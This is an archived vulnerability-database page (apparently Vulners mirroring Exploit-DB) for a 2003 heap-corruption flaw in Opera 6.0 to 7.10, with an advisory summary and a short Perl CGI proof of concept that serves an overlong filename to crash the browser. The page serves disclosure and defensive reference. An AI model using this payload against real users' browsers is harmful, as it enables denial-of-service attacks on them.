Lucene search
+L

Opera 6.0.x/7.0 - Long File Name Remote Heap Corruption

🗓️ 28 Apr 2003 00:00:00Reported by imagine & nesuminType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 28 Views

Vulnerability in Opera 6.0 to 7.0 allows heap corruption via filename extensions, causing crashes.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
Opera < 7.11 Filename Extension Handling Overflow
20 Aug 200400:00
nessus
nessus
Tenable Nessus
Opera < 7.11 Filename Extension Handling Overflow
6 May 200300:00
nessus
cve
CVE
CVE-2003-1396
19 Oct 200710:00
cve
cvelist
Cvelist
CVE-2003-1396
19 Oct 200710:00
cvelist
euvd
EUVD
EUVD-2003-1386
7 Oct 202500:30
euvd
nvd
NVD
CVE-2003-1396
31 Dec 200305:00
nvd
source: https://www.securityfocus.com/bid/7450/info

A vulnerability has been reported for Opera versions 7.10 and earlier. The problem is said to occur due to insufficient bounds checking on filename extensions. As a result, it may be possible for an attacker to corrupt heap-based memory.

Successful exploitation of this vulnerability may result in a denial of service, possibly prolonged. If a malicious filename entry were placed in a cache file, Opera may continuously crash until the cache file has been deleted.

#!/usr/bin/perl
# Smash Heap Memory.
# This script is CGI program.

$|=1;
my $filename = "." . "\xCC" x (int(rand(0x20000)) + 0x100);

print "Content-type: text/html\r\n";
print qq~Content-Disposition: filename="$filename"\r\n~;
print "\r\n";
print "<html><body>Love & Peace :)</body></html>\r\n";

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Nov 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.0909
28